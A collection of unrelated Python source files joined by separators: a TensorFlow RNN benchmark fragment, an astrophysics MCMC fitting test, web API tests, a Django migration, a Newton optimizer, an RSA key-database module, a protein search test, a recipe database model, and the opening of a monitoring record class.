          "\t dt(tuple_state) \t dt(concat_state)/dt(tuple_state)")
    for batch_size in (16, 128,):
      for max_time in (50,):
        for num_units in (16, 128,):
          for use_gpu in (False, True):
            dt_concat, dt_tuple = concat_state_vs_tuple_state_rnn_benchmark(
                batch_size, max_time, num_units, use_gpu)
            self.report_benchmark(
                name="concat_state_time_T%02d_B%03d_N%03d_gpu_%s"
                % (max_time, batch_size, num_units, use_gpu),
                iters=20, wall_time=dt_concat)
            self.report_benchmark(
                name="tuple_state_time_T%02d_B%03d_N%03d_gpu_%s"
                % (max_time, batch_size, num_units, use_gpu),
                iters=20, wall_time=dt_tuple)
# Run the benchmark classes via the TensorFlow test runner when executed directly.
if __name__ == "__main__":
  tf.test.main()
|
"""
test_inference_lf.py
Author: Jordan Mirocha
Affiliation: McGill
Created on: Wed 25 Mar 2020 11:01:32 EDT
Description:
"""
import os
import glob
import ares
import numpy as np
import matplotlib.pyplot as pl
from ares.physics.Constants import rhodot_cgs
def test():
    """Regression test for UVLF (galaxy luminosity function) inference.

    Runs a very short MCMC fit of an evolving-Schechter UVLF against the
    Bouwens+ 2015 data at z~6, checks the resulting ModelSet for internal
    consistency, and exercises the redshift-tolerance (``ztol``)
    error-handling path. MCMC output files are removed at the end.
    """
    # Will save UVLF at these redshifts and magnitudes
    redshifts = np.array([3, 3.8, 4, 4.9, 5, 5.9, 6, 6.9, 7, 7.9, 8])
    MUV = np.arange(-28, -8.8, 0.2)

    fit_z = [6]

    # blob 1: the LF. Give it a name, and the function needed to calculate it.
    blob_n1 = ['galaxy_lf']
    blob_i1 = [('z', redshifts), ('x', MUV)]
    blob_f1 = ['LuminosityFunction']

    blob_pars = {
        'blob_names': [blob_n1],
        'blob_ivars': [blob_i1],
        'blob_funcs': [blob_f1],
        'blob_kwargs': [None],
    }

    # Do a Schechter function fit just for speed
    base_pars = {
        'pop_sfr_model': 'uvlf',

        # Stellar pop + fesc
        'pop_calib_wave': 1600.,
        'pop_lum_per_sfr': 0.2e28,  # to avoid using synthesis models

        'pop_uvlf': 'pq',
        'pq_func': 'schechter_evol',
        'pq_func_var': 'MUV',
        'pq_func_var2': 'z',

        # Bouwens+ 2015 Table 6 for z=5.9
        #'pq_func_par0[0]': 0.39e-3,
        #'pq_func_par1[0]': -21.1,
        #'pq_func_par2[0]': -1.90,

        # phi_star
        'pq_func_par0': np.log10(0.47e-3),
        # z-pivot
        'pq_func_par3': 6.,
        # Mstar
        'pq_func_par1': -20.95,
        # alpha
        'pq_func_par2': -1.87,
        'pq_func_par4': -0.27,
        'pq_func_par5': 0.01,
        'pq_func_par6': -0.1,
    }

    base_pars.update(blob_pars)

    free_pars = [
        'pq_func_par0',
        'pq_func_par1',
        'pq_func_par2',
    ]

    is_log = [False, False, False]

    from distpy import DistributionSet
    from distpy import UniformDistribution

    # Flat priors on log10(phi_star), Mstar, and alpha.
    ps = DistributionSet()
    ps.add_distribution(UniformDistribution(-5, -1), 'pq_func_par0')
    ps.add_distribution(UniformDistribution(-25, -15), 'pq_func_par1')
    ps.add_distribution(UniformDistribution(-3, 0), 'pq_func_par2')

    guesses = {
        'pq_func_par0': -3,
        'pq_func_par1': -22.,
        'pq_func_par2': -2.,
    }

    # Fitting more than one redshift also frees the evolution parameters.
    if len(fit_z) > 1:
        free_pars.extend(['pq_func_par4', 'pq_func_par5', 'pq_func_par6'])
        is_log.extend([False] * 3)
        guesses['pq_func_par4'] = -0.3
        guesses['pq_func_par5'] = 0.01
        guesses['pq_func_par6'] = 0.
        ps.add_distribution(UniformDistribution(-2, 2), 'pq_func_par4')
        ps.add_distribution(UniformDistribution(-2, 2), 'pq_func_par5')
        ps.add_distribution(UniformDistribution(-2, 2), 'pq_func_par6')

    # Test error-handling: ztol=0 should reject the data, ztol=0.3 should fit.
    for ztol in [0, 0.3]:
        # Initialize a fitter object and give it the data to be fit
        fitter_lf = ares.inference.FitGalaxyPopulation(**base_pars)

        # The data can also be provided more explicitly
        fitter_lf.ztol = ztol
        fitter_lf.redshifts = {'lf': fit_z}

        if ztol == 0:
            try:
                fitter_lf.data = 'bouwens2015'
            except ValueError:
                print("Correctly caught error! Moving on.")
                continue
        else:
            # This should work if ztol >= 0.1, so we want this to crash
            # visibly if there's a failure internally.
            fitter_lf.data = 'bouwens2015'

        # Human-readable tag of the fitted redshifts (e.g. 'z_6').
        fitz_s = 'z_'
        for red in np.sort(fit_z):
            fitz_s += str(int(round(red)))

        fitter = ares.inference.ModelFit(**base_pars)
        fitter.add_fitter(fitter_lf)

        # Establish the object to which we'll pass parameters
        from ares.populations.GalaxyCohort import GalaxyCohort
        fitter.simulator = GalaxyCohort

        fitter.parameters = free_pars
        fitter.is_log = is_log
        fitter.prior_set = ps

        # In general, the more the merrier (~hundreds); kept tiny for speed.
        fitter.nwalkers = 2 * len(fitter.parameters)
        fitter.jitter = [0.1] * len(fitter.parameters)
        fitter.guesses = guesses

        # Run the thing
        fitter.run('test_uvlf', burn=10, steps=10, save_freq=10,
                   clobber=True, restart=False)

        # Make sure things make sense
        anl = ares.analysis.ModelSet('test_uvlf')

        ax = anl.ReconstructedFunction('galaxy_lf', ivar=[6, None], fig=3,
                                       color='gray', alpha=0.3)
        anl.ReconstructedFunction('galaxy_lf', ivar=[6, None],
                                  ax=ax, fig=3,
                                  color='b', alpha=0.3, fill=False, samples='all')
        anl.ReconstructedFunction('galaxy_lf', ivar=[6, None],
                                  ax=ax, fig=3,
                                  color='y', alpha=1.0, use_best=True, ls='--', lw=3)

        ax.set_yscale('log')
        ax.set_ylim(1e-8, 1)
        gpop = ares.analysis.GalaxyPopulation()
        gpop.PlotLF(5.9, sources='bouwens2015', ax=ax)

        # Other random stuff: the assembled kwargs must line up with the chain.
        all_kwargs = anl.AssembleParametersList(include_bkw=True)
        assert len(all_kwargs) == anl.chain.shape[0]

        # Maximum-likelihood sample must match the per-sample kwargs.
        iML = np.argmax(anl.logL)
        best_pars = anl.max_likelihood_parameters()
        for i, par in enumerate(best_pars.keys()):
            assert all_kwargs[iML][par] == best_pars[par]

        anl.CorrelationMatrix(anl.parameters, fig=5)

    # Clean-up: remove MCMC output files from $ARES.
    mcmc_files = glob.glob('{}/test_uvlf*'.format(os.environ.get('ARES')))

    # Iterate over the list of filepaths & remove each file.
    for fn in mcmc_files:
        try:
            os.remove(fn)
        except OSError:
            # Bug fix: this previously printed an undefined name (filePath),
            # which would have raised NameError instead of reporting the file.
            print("Error while deleting file : ", fn)
# Allow running this test module directly as a script.
if __name__ == '__main__':
    test()
|
from datetime import timedelta as td
from hc.api.models import Check
from hc.test import BaseTestCase
class GetBadgesTestCase(BaseTestCase):
    """Tests for the GET /api/v1/badges/ endpoint."""

    def setUp(self):
        super().setUp()

        # One check with two tags so the response contains badge entries.
        self.a1 = Check(
            project=self.project,
            name="Alice 1",
            timeout=td(seconds=3600),
            grace=td(seconds=900),
            n_pings=0,
            status="new",
            tags="foo bar",
        )
        self.a1.save()

        self.url = "/api/v1/badges/"

    def get(self, api_key="X" * 32, qs=""):
        """GET the badges endpoint with the given API key and query string."""
        return self.client.get(self.url + qs, HTTP_X_API_KEY=api_key)

    def test_it_works(self):
        response = self.get()
        self.assertEqual(response.status_code, 200)
        self.assertEqual(response["Access-Control-Allow-Origin"], "*")

        payload = response.json()
        self.assertTrue("foo" in payload["badges"])
        self.assertTrue("svg" in payload["badges"]["foo"])

    def test_readonly_key_is_allowed(self):
        self.project.api_key_readonly = "R" * 32
        self.project.save()

        response = self.get(api_key=self.project.api_key_readonly)
        self.assertEqual(response.status_code, 200)

    def test_it_rejects_post(self):
        response = self.csrf_client.post(self.url, HTTP_X_API_KEY="X" * 32)
        self.assertEqual(response.status_code, 405)

    def test_it_handles_missing_api_key(self):
        response = self.client.get(self.url)
        self.assertContains(response, "missing api key", status_code=401)
|
# Generated by Django 2.1.1 on 2019-03-16 21:45
from django.db import migrations, models
class Migration(migrations.Migration):
    """Adds the required ``nickname`` CharField to the Customer model."""

    dependencies = [
        ('deliveries', '0002_auto_20190316_2128'),
    ]

    operations = [
        migrations.AddField(
            model_name='customer',
            name='nickname',
            # 'joe' is a one-off default used only to backfill existing rows;
            # preserve_default=False drops it from the final field definition.
            field=models.CharField(default='joe', max_length=200),
            preserve_default=False,
        ),
    ]
|
import numpy as np
from typing import Callable
from autograd import hessian
from .newton_base import NewtonBase
class Newton(NewtonBase):
    """Classic Newton's method: steps use the exact inverse Hessian."""

    def __init__(self, stop_criterion, step_optimizer) -> None:
        super().__init__(stop_criterion, step_optimizer)

    def _get_inverse_h(self, xk: np.ndarray) -> np.ndarray:
        """Evaluate the Hessian at ``xk``, collapse it to 2-D, and invert it."""
        raw = self._hessian(xk)
        # autograd's hessian carries extra axes; flatten to (n, n) exactly as
        # the original reshape((shape[1], shape[1])) did.
        n = raw.shape[1]
        return np.linalg.inv(raw.reshape((n, n)))

    def optimize(self, f: Callable, x0: np.ndarray) -> np.ndarray:
        # Build the autograd Hessian of f once per optimize() call.
        self._hessian = hessian(f)
        return super().optimize(f, x0)
|
import os
# Resolve the project layout relative to this file. These constants are
# consumed elsewhere, so the exact trailing-slash string format is preserved.
PROJECT_ROOT = os.path.dirname(os.path.abspath(__file__))
BASE_DIR = os.path.dirname(PROJECT_ROOT)

DATA_DIR = BASE_DIR + '/data/'
SAMPLE_DIR = BASE_DIR + '/sample/'
MODEL_DIR = BASE_DIR + '/model/'
PARAM_DIR = BASE_DIR + '/output/param/'
OUTPUT_DIR = BASE_DIR + '/output/result/'

# Create every directory up front. exist_ok=True avoids the
# check-then-create race of the previous os.path.exists() guard.
for _dir in (DATA_DIR, SAMPLE_DIR, MODEL_DIR, PARAM_DIR, OUTPUT_DIR):
    print(_dir)
    os.makedirs(_dir, exist_ok=True)
# -*- coding: utf_8 -*-
# vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4
# Crypto Key Database
import os
import sqlite3
import shutil
import uuid
import random
import base64
import Crypto.PublicKey.RSA
import Crypto.Random.random
import Crypto.Cipher.PKCS1_OAEP
import Crypto.Hash.SHA256
# increment keydb_version on DB schema changes
# (compared against SQLite's PRAGMA user_version on open; a lower stored
# value triggers KeyDb._Upgrade)
keydb_version = 2017090101
# main key db
# main key db
class KeyDb:
    """SQLite-backed store for RSA key pairs.

    Public keys live in the ``pubkey`` table (with an expiry timestamp);
    private keys live in ``privkey``, optionally passphrase-protected, with
    the passphrase itself stored encrypted under a parent key. The schema
    version is tracked via ``PRAGMA user_version`` and upgraded in place by
    ``_Upgrade``. Each method opens its own short-lived connection in
    autocommit mode (``isolation_level = None``).
    """

    def __init__(self,dbpath):
        """Open (or create) the key database at ``dbpath`` and verify it."""
        self._dbpath = dbpath
        # create new DB if it doesn't exist
        if not os.path.isfile(self._dbpath):
            db_create(self._dbpath)
        # connect to db
        conn = sqlite3.connect(self._dbpath)
        conn.isolation_level = None  # autocommit
        c = conn.cursor()
        # enable cell size checking
        c.execute('PRAGMA cell_size_check = 1')
        # optimize and quick-check on open
        c.execute('PRAGMA quick_check')
        check_result = c.fetchone()[0]
        if check_result != 'ok':
            raise ValueError("DB Check failed: " + check_result)
        c.execute('PRAGMA optimize')
        # check current db version against code version
        # perform upgrade if necessary
        c.execute('PRAGMA user_version')
        current_db_version = c.fetchone()[0]
        conn.close()
        if current_db_version < keydb_version:
            self._Upgrade(current_db_version)

    def New(self,parent_key_id=None,bits=2048,password=None,expiry='+2 years'):
        """Generate and store a new RSA key pair; return its UUID string.

        If ``parent_key_id`` is given, ``password`` is encrypted under that
        parent key (then base64-encoded) and stored next to the private key.
        ``expiry`` is an SQLite datetime modifier applied to 'now'.
        """
        conn = sqlite3.connect(self._dbpath)
        conn.isolation_level = None
        c = conn.cursor()
        new_uuid = str(uuid.uuid4())
        key_priv = Crypto.PublicKey.RSA.generate(bits)
        key_pub = key_priv.publickey()
        store_password = None
        if parent_key_id:
            store_password = base64.standard_b64encode(self.Encrypt(parent_key_id,password))
        # defensive delete in case the UUID somehow already exists
        c.execute('DELETE FROM pubkey WHERE key_id=?', (new_uuid,))
        c.execute('DELETE FROM privkey WHERE key_id=?', (new_uuid,))
        c.execute('INSERT INTO pubkey (key_id, key_expiry, key) \
                   VALUES (?, datetime(\'now\', ?), ?)',
                  (new_uuid, expiry, key_pub.exportKey(),)
                  )
        c.execute('INSERT INTO privkey (key_id, key_unlock_key_id, key_unlock_password, key) \
                   VALUES (?, ?, ?, ?)',
                  (new_uuid, parent_key_id, store_password, key_priv.exportKey(passphrase=password),)
                  )
        conn.close()
        return new_uuid

    def Del(self,key_id):
        # NOTE(review): stub — opens and closes the DB but deletes nothing yet
        conn = sqlite3.connect(self._dbpath)
        conn.isolation_level = None
        c = conn.cursor()
        conn.close()

    def Check(self,key_id):
        # NOTE(review): stub — no key checking implemented yet
        conn = sqlite3.connect(self._dbpath)
        conn.isolation_level = None
        c = conn.cursor()
        conn.close()

    def HttpImport(self,data):
        # NOTE(review): stub — HTTP import not implemented yet
        pass

    def HttpExport(self,data):
        # NOTE(review): stub — HTTP export not implemented yet
        pass

    def ImportPubkey(self,key_id,key):
        # NOTE(review): stub — public-key import not implemented yet
        conn = sqlite3.connect(self._dbpath)
        conn.isolation_level = None
        c = conn.cursor()
        conn.close()

    def ExportPubkey(self,key_id):
        # NOTE(review): stub — public-key export not implemented yet
        conn = sqlite3.connect(self._dbpath)
        conn.isolation_level = None
        c = conn.cursor()
        conn.close()

    def Encrypt(self,key_id,data):
        """RSA-OAEP(SHA-256)-encrypt str ``data`` with public key ``key_id``.

        Returns ciphertext bytes. Raises ValueError if the key is missing
        or expired.
        """
        # RSA PubKey Encryption of data
        # fetch public key
        conn = sqlite3.connect(self._dbpath)
        conn.isolation_level = None
        c = conn.cursor()
        c.execute('SELECT key FROM pubkey WHERE key_id = ? AND key_expiry > datetime(\'now\')', (key_id,))
        row = c.fetchone()
        key_pub = None
        if not row:
            # NOTE(review): the connection is not closed on this error path
            raise ValueError("Key not found in database")
        # create RSA key object
        key_pub = Crypto.PublicKey.RSA.importKey(row[0])
        # RSA encryption
        cipher = Crypto.Cipher.PKCS1_OAEP.new(key_pub, hashAlgo=Crypto.Hash.SHA256)
        message = cipher.encrypt(data.encode('utf-8'))
        conn.close()
        return message

    def Decrypt(self,key_id,password,data):
        """RSA-OAEP(SHA-256)-decrypt ``data`` with private key ``key_id``.

        ``password`` unlocks the stored private key. Returns the plaintext
        as str. Raises ValueError if the key is missing or cannot be loaded.
        """
        # RSA PubKey Decryption of data
        # fetch public key
        conn = sqlite3.connect(self._dbpath)
        conn.isolation_level = None
        c = conn.cursor()
        c.execute('SELECT key FROM privkey WHERE key_id = ?', (key_id,))
        row = c.fetchone()
        key_priv = None
        if not row:
            # NOTE(review): the connection is not closed on this error path
            raise ValueError("Key not found in database")
        # create RSA key object
        key = row[0]
        key_priv = Crypto.PublicKey.RSA.importKey(key,passphrase=password)
        if not key_priv:
            raise ValueError("Key could not be loaded, bad password?")
        # RSA encryption
        cipher = Crypto.Cipher.PKCS1_OAEP.new(key_priv, hashAlgo=Crypto.Hash.SHA256)
        message = cipher.decrypt(data)
        conn.close()
        return message.decode('utf-8')

    def Sign(self,key_id,password,data):
        # NOTE(review): stub — signing not implemented yet
        conn = sqlite3.connect(self._dbpath)
        conn.isolation_level = None
        c = conn.cursor()
        conn.close()

    def Verify(self,key_id,data):
        # NOTE(review): stub — signature verification not implemented yet
        conn = sqlite3.connect(self._dbpath)
        conn.isolation_level = None
        c = conn.cursor()
        conn.close()

    def KeyPassword(self,key_id):
        # return the password stored in the db for the key (should be encrypted)
        conn = sqlite3.connect(self._dbpath)
        conn.isolation_level = None
        c = conn.cursor()
        c.execute('SELECT key_unlock_password FROM privkey WHERE key_id = ?', (key_id,))
        row = c.fetchone()
        conn.close()
        if not row:
            return None
        else:
            # stored base64-encoded; still encrypted under the parent key
            return base64.standard_b64decode(row[0])

    def _Upgrade(self,current_db_version):
        """Bring the DB schema from ``current_db_version`` up to keydb_version.

        For existing (non-zero-version) databases, takes an exclusive lock,
        copies the DB file as a backup, and integrity-checks it before
        applying the in-order schema upgrades.
        """
        # connect to DB handle
        conn = sqlite3.connect(self._dbpath)
        conn.isolation_level = None
        c = conn.cursor()
        # current_db_version == 0 means DB is brand new
        # If not brand new, back it up and perform full checks
        if current_db_version > 0:
            c.execute('PRAGMA database_list')
            dbpath = c.fetchone()[2]
            # back up DB before modifying
            # lock the entire DB
            # see https://sqlite.org/pragma.html#pragma_locking_mode
            c.execute('PRAGMA locking_mode = EXCLUSIVE')
            # write some data to obtain an exclusive lock
            c.execute('CREATE TABLE __temp_upgrade (temp INT)')
            c.execute('INSERT INTO __temp_upgrade (temp) values (1)')
            c.execute('SELECT * FROM __temp_upgrade')
            c.execute('DROP TABLE __temp_upgrade')
            c.execute('PRAGMA query_only = 1')
            # copy DB file while we have an exclusive lock
            backupdbpath = dbpath + '-backup-v' + str(current_db_version)
            shutil.copyfile(dbpath, backupdbpath)
            # unlock & write again to release exclusive lock
            c.execute('PRAGMA query_only = 0')
            c.execute('PRAGMA locking_mode = NORMAL')
            c.execute('CREATE TABLE __temp_upgrade (temp INT)')
            c.execute('INSERT INTO __temp_upgrade (temp) values (1)')
            c.execute('SELECT * FROM __temp_upgrade')
            c.execute('DROP TABLE __temp_upgrade')
            # perform integrity check
            c.execute('PRAGMA integrity_check')
            check_result = c.fetchone()[0]
            if check_result != 'ok':
                raise ValueError("DB Check failed: " + check_result)
        # perform upgrades
        # IMPORTANT: upgrades are performed IN ORDER
        # remember to set current_db_version to the new version
        # Example:
        #if current_db_version < 2017090101:
        #    c.execute('CREATE TABLE foo(bar INT, baz TEXT)')
        #    c.execute('PRAGMA user_version = 2017090101')
        #    current_db_version = 2017090101
        #
        #if current_db_version < 2017090102:
        #    c.execute('alter table foo add column blah text')
        #    c.execute('PRAGMA user_version = 2017090102')
        #    current_db_version = 2017090102

        # version 2017090101
        # initial version
        if current_db_version < 2017090101:
            c.execute('CREATE TABLE privkey (key_id TEXT PRIMARY KEY NOT NULL, key TEXT, key_unlock_key_id TEXT, key_unlock_password TEXT)')
            c.execute('CREATE TABLE pubkey (key_id TEXT PRIMARY KEY NOT NULL, key TEXT, key_expiry TEXT)')
            c.execute('PRAGMA user_version = 2017090101')
            current_db_version = 2017090101
        # End of upgrades, run an optimize and vacuum too
        c.execute('PRAGMA optimize')
        c.execute('VACUUM')
        conn.close()
# in-memory password storage scrambling function for key passwords
# in-memory password storage scrambling function for key passwords
class KeyPw:
    """Scrambles key passwords held in memory with a per-session RSA pair."""

    def __init__(self):
        # possible characters for randomly-generated passwords (typable ASCII)
        self.pwchars = list('~!@#$%^&*()_+1234567890-=QWERTYUIOP{}|qwertyuiop[]\\ASDFGHJKL:"asdfghjkl;\'ZXCVBNM<>?zxcvbnm,./ ')
        # RSA pair created per session; used only to encrypt passwords in RAM
        self._session_key_priv = Crypto.PublicKey.RSA.generate(1024)
        self._session_key_pub = self._session_key_priv.publickey()

    def New(self,length=32):
        """Generate a random password of ``length`` chars from self.pwchars.

        The length is capped by the session RSA key (max ~128 characters for
        a 1024-bit key) so the result stays encryptable in one OAEP block.
        """
        maxbytes = self._session_key_priv.size() / 8
        if length > maxbytes:
            raise ValueError("Length must not be larger than RSA key size")
        picks = [Crypto.Random.random.choice(self.pwchars) for _ in range(length)]
        return ''.join(picks)

    def SessionEncrypt(self,plainpw):
        """Encrypt a plaintext password with the session public key."""
        oaep = Crypto.Cipher.PKCS1_OAEP.new(self._session_key_pub, hashAlgo=Crypto.Hash.SHA256)
        return oaep.encrypt(plainpw.encode('utf-8'))

    def SessionDecrypt(self,encpw):
        """Decrypt a session-encrypted password back to str."""
        oaep = Crypto.Cipher.PKCS1_OAEP.new(self._session_key_priv, hashAlgo=Crypto.Hash.SHA256)
        return oaep.decrypt(encpw).decode('utf-8')
def db_create(dbpath):
    """Create and initialize an empty key database file at ``dbpath``."""
    conn = sqlite3.connect(dbpath)
    conn.isolation_level = None  # autocommit
    cur = conn.cursor()
    # user_version 0 marks a brand-new DB, so the first upgrade skips backup
    cur.execute('PRAGMA user_version = 0')
    # enable cell size checking
    cur.execute('PRAGMA cell_size_check = 1')
    # 4k page size and UTF-8 text encoding
    cur.execute('PRAGMA page_size = 4096')
    cur.execute('PRAGMA encoding = "UTF-8"')
    # VACUUM rebuilds the file so the page size takes effect
    cur.execute('VACUUM')
    conn.close()
|
"""Unit tests for protein_query module"""
from db_searcher import DbSearcher
from protein_query import ProteinSearcher
import os
import pandas as pd
TEST_FOLDER = os.path.dirname(__file__)
DB_SEARCHER_DATA_FOLDER = os.path.join(TEST_FOLDER, "db_searcher_data")
# DB_SEARCHER_DATA_FOLDER is a folder exclusive for this unit test.
# It is expected to contain exactly 2 files (one mzML and one fasta).
# Bug fix: os.listdir() returns entries in arbitrary order, so the previous
# positional unpacking could assign the mzML file to `fasta_file` and vice
# versa. Select each file by extension instead.
_data_files = sorted(os.listdir(DB_SEARCHER_DATA_FOLDER))
fasta_file = next((f for f in _data_files if f.lower().endswith(('.fasta', '.fa'))), None)
mzml_file = next((f for f in _data_files if f.lower().endswith('.mzml')), None)
if fasta_file is None or mzml_file is None:
    # Fall back to the original positional behaviour for unusual extensions.
    fasta_file, mzml_file = _data_files
# Absolute paths
mzml_file_path = os.path.join(DB_SEARCHER_DATA_FOLDER, mzml_file)
fasta_file_path = os.path.join(DB_SEARCHER_DATA_FOLDER, fasta_file)
class TestProteinSearcher:
    """Unit tests for the ProteinSearcher class"""

    def test_protein_query(self):
        """Ensure peptides are mapped to the expected protein entries."""
        searcher = DbSearcher(mzml_file=mzml_file_path, fasta_file=fasta_file_path)
        # Run the DB search; this also populates peptide_info_df.
        searcher.db_searcher()
        peptides = searcher.peptide_info_df

        protein_searcher = ProteinSearcher(peptide_list=peptides)
        protein_searcher.download_protein_info()
        matches = protein_searcher.protein_matches

        assert isinstance(matches, dict)
        assert list(matches.keys()) == ["DFASSGGYVLHLHR", "IALSRPNVEVVALNDPFITNDYAAYMFK",
                                        "RPGADSDIGGFGGLFDLAQAGFR"]
        # Peptides without a protein match come back as empty lists.
        assert matches["DFASSGGYVLHLHR"] == []
        assert matches["RPGADSDIGGFGGLFDLAQAGFR"] == []
        assert matches["IALSRPNVEVVALNDPFITNDYAAYMFK"] == [{'location': '19',
                                                            'peptide': 'LALSRPNVEVVALNDPFLTNDYAAYMFK',
                                                            'protein': 'Microbe_sp|P00359|G3P3_YEAST'}]
|
import datetime
from datetime import date
from typing import List
import sqlalchemy as sa
import sqlalchemy.orm as orm
from mealie.db.models.model_base import BaseMixins, SqlAlchemyBase
from mealie.db.models.recipe.api_extras import ApiExtras
from mealie.db.models.recipe.category import Category, recipes2categories
from mealie.db.models.recipe.ingredient import RecipeIngredient
from mealie.db.models.recipe.instruction import RecipeInstruction
from mealie.db.models.recipe.note import Note
from mealie.db.models.recipe.nutrition import Nutrition
from mealie.db.models.recipe.tag import Tag, recipes2tags
from mealie.db.models.recipe.tool import Tool
from sqlalchemy.ext.orderinglist import ordering_list
from sqlalchemy.orm import validates
class RecipeModel(SqlAlchemyBase, BaseMixins):
    """SQLAlchemy model for a recipe and all of its nested child rows."""

    __tablename__ = "recipes"

    # Database Specific
    id = sa.Column(sa.Integer, primary_key=True)

    # General Recipe Properties
    name = sa.Column(sa.String, nullable=False)
    description = sa.Column(sa.String)
    image = sa.Column(sa.String)
    totalTime = sa.Column(sa.String)
    prepTime = sa.Column(sa.String)
    performTime = sa.Column(sa.String)
    cookTime = sa.Column(sa.String)
    recipeYield = sa.Column(sa.String)
    recipeCuisine = sa.Column(sa.String)
    tools: List[Tool] = orm.relationship("Tool", cascade="all, delete-orphan")
    nutrition: Nutrition = orm.relationship("Nutrition", uselist=False, cascade="all, delete-orphan")
    recipeCategory: List = orm.relationship("Category", secondary=recipes2categories, back_populates="recipes")

    # Ordered child collections; `position` is maintained by ordering_list.
    recipeIngredient: List[RecipeIngredient] = orm.relationship(
        "RecipeIngredient",
        cascade="all, delete-orphan",
        order_by="RecipeIngredient.position",
        collection_class=ordering_list("position"),
    )
    recipeInstructions: List[RecipeInstruction] = orm.relationship(
        "RecipeInstruction",
        cascade="all, delete-orphan",
        order_by="RecipeInstruction.position",
        collection_class=ordering_list("position"),
    )

    # Mealie Specific
    slug = sa.Column(sa.String, index=True, unique=True)
    tags: List[Tag] = orm.relationship("Tag", secondary=recipes2tags, back_populates="recipes")
    dateAdded = sa.Column(sa.Date, default=date.today)
    notes: List[Note] = orm.relationship("Note", cascade="all, delete-orphan")
    rating = sa.Column(sa.Integer)
    orgURL = sa.Column(sa.String)
    extras: List[ApiExtras] = orm.relationship("ApiExtras", cascade="all, delete-orphan")

    @validates("name")
    def validate_name(self, key, name):
        # Reject empty recipe names.
        # NOTE(review): assert is stripped under `python -O`; kept as-is so
        # any caller catching AssertionError keeps working.
        assert name != ""
        return name

    def __init__(
        self,
        session,
        name: str = None,
        description: str = None,
        image: str = None,
        recipeYield: str = None,
        recipeIngredient: List[str] = None,
        recipeInstructions: List[dict] = None,
        recipeCuisine: str = None,
        totalTime: str = None,
        prepTime: str = None,
        nutrition: dict = None,
        tools: List[str] = None,  # default changed from mutable [] to None
        performTime: str = None,
        slug: str = None,
        recipeCategory: List[str] = None,
        tags: List[str] = None,
        dateAdded: datetime.date = None,
        notes: List[dict] = None,
        rating: int = None,
        orgURL: str = None,
        extras: dict = None,
    ) -> None:
        """Build the recipe row and all nested child rows.

        `session` is used to create-or-fetch Category and Tag rows. All
        collection arguments accept None (treated as empty).
        """
        self.name = name
        self.description = description
        self.image = image
        self.recipeCuisine = recipeCuisine

        # Bug fix: previously tested `self.nutrition` (the not-yet-populated
        # relationship attribute) instead of the `nutrition` argument, so
        # provided nutrition data was silently dropped on creation.
        self.nutrition = Nutrition(**nutrition) if nutrition else Nutrition()

        self.tools = [Tool(tool=x) for x in tools] if tools else []
        self.recipeYield = recipeYield
        # `or []` guards let partial payloads omit any collection entirely.
        self.recipeIngredient = [RecipeIngredient(ingredient=ingr) for ingr in recipeIngredient or []]
        self.recipeInstructions = [
            RecipeInstruction(text=instruc.get("text"), type=instruc.get("@type", None))
            for instruc in recipeInstructions or []
        ]
        self.totalTime = totalTime
        self.prepTime = prepTime
        self.performTime = performTime
        self.recipeCategory = [Category.create_if_not_exist(session=session, name=cat) for cat in recipeCategory or []]

        # Mealie Specific
        self.tags = [Tag.create_if_not_exist(session=session, name=tag) for tag in tags or []]
        self.slug = slug
        self.dateAdded = dateAdded
        self.notes = [Note(**note) for note in notes or []]
        self.rating = rating
        self.orgURL = orgURL
        self.extras = [ApiExtras(key=key, value=value) for key, value in (extras or {}).items()]

    def update(
        self,
        session,
        name: str = None,
        description: str = None,
        image: str = None,
        recipeYield: str = None,
        recipeIngredient: List[str] = None,
        recipeInstructions: List[dict] = None,
        recipeCuisine: str = None,
        totalTime: str = None,
        tools: List[str] = None,  # default changed from mutable [] to None
        prepTime: str = None,
        performTime: str = None,
        nutrition: dict = None,
        slug: str = None,
        recipeCategory: List[str] = None,
        tags: List[str] = None,
        dateAdded: datetime.date = None,
        notes: List[dict] = None,
        rating: int = None,
        orgURL: str = None,
        extras: dict = None,
    ):
        """Updated a database entry by removing nested rows and rebuilds the row through the __init__ functions"""
        self.__init__(
            session=session,
            name=name,
            description=description,
            image=image,
            recipeYield=recipeYield,
            recipeIngredient=recipeIngredient,
            recipeInstructions=recipeInstructions,
            totalTime=totalTime,
            recipeCuisine=recipeCuisine,
            prepTime=prepTime,
            performTime=performTime,
            nutrition=nutrition,
            tools=tools,
            slug=slug,
            recipeCategory=recipeCategory,
            tags=tags,
            dateAdded=dateAdded,
            notes=notes,
            rating=rating,
            orgURL=orgURL,
            extras=extras,
        )
|
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
"""A module for data of monitor."""
import json
import numbers
from datetime import datetime, timezone

from superbench.benchmarks import ReduceType
class MonitorRecord:
    """Record class to save all monitoring data for one sampling point."""
    # how each metric is reduced when aggregating multiple samples
    reduce_ops = {
        'gpu_temperature': ReduceType.MAX,
        'gpu_power_limit': ReduceType.MIN,
        'gpu_corrected_ecc': ReduceType.LAST,
        'gpu_uncorrected_ecc': ReduceType.LAST,
        'gpu_remap': ReduceType.LAST,
    }

    def __init__(self):
        """Constructor."""
        # Sample timestamp in UTC. Uses the timezone-aware replacement for
        # the deprecated datetime.utcnow(); the formatted string is
        # byte-identical to the old output (no offset in the format).
        self.__time = datetime.now(timezone.utc).strftime('%Y-%m-%d %H:%M:%S')
        self.__cpu_usage = None
        self.__mem_used = None
        self.__mem_total = None
        self.__gpu_usage = list()
        self.__gpu_temperature = list()
        self.__gpu_power_limit = list()
        self.__gpu_mem_used = list()
        self.__gpu_mem_total = list()
        self.__gpu_corrected_ecc = list()
        self.__gpu_uncorrected_ecc = list()
        self.__gpu_remap_info = list()
        self.__net_receive = dict()
        self.__net_transmit = dict()

    @property
    def time(self):
        """Decoration function to access __time."""
        return self.__time

    @property
    def cpu_usage(self):
        """Decoration function to access __cpu_usage."""
        return self.__cpu_usage

    @cpu_usage.setter
    def cpu_usage(self, usage):
        """Set the cpu usage.

        Args:
            usage (float): cpu usage.
        """
        self.__cpu_usage = usage

    @property
    def mem_used(self):
        """Decoration function to access __mem_used."""
        return self.__mem_used

    @mem_used.setter
    def mem_used(self, mem_used):
        """Set the used host memory, unit: MB.

        Args:
            mem_used (float): used host memory.
        """
        self.__mem_used = mem_used

    @property
    def mem_total(self):
        """Decoration function to access __mem_total."""
        return self.__mem_total

    @mem_total.setter
    def mem_total(self, mem_total):
        """Set the total host memory, unit: MB.

        Args:
            mem_total (float): total host memory.
        """
        self.__mem_total = mem_total

    @property
